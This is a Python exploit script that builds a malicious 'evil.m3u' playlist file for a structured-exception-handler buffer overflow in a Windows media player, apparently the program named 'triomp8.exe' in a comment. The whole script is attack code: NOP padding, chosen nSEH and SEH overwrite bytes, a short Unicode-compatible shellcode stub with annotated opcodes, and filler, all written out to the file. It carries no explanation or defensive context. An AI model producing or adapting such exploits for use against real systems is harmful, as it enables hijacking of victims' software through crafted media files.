#!/usr/bin/env python

filename = "evil.m3u"

#--------------------------------------------------------#
# nSEH => \x41\x71 => 41	INC ECX			 #
#		      0071 00	ADD BYTE PTR DS:[ECX],DH #
# SEH =>  \xF2\X41 => F2	PREFIX REPNE:		 #
#		      0041 00	ADD BYTE PTR DS:[ECX],AL #
#--------------------------------------------------------#
# x004100F2 => pop esi # pop ebx # ret 04 | triomp8.exe  #
#------------------------------------------------------- #

nSEH = "\x41\x71"
SEH = "\xF2\x41"
boom = nSEH + SEH
cave = ("\x55" 		# PUSH EBP
	"\x71" 		# NOP UNICODE
	"\x58" 		# POP EAX
	"\x71" 		# NOP UNICODE
	"\x05\x20\x11" 	# ADD 11002000,EAX
	"\x71" 		# NOP UNICODE
	"\x2D\x17\x11" 	# ADD 11001700,EAX
	"\x71" 		# NOP UNICODE
	"\x50"		# PUSH EAX
	"\x71" 		# NOP UNICODE
	"\xc3")		# RET

buffer = "\x90"*536 + boom + cave + "B"*(4466-len(boom)-len(cave))

textfile = open(filename, 'w')
textfile.write(buffer)
textfile.close()
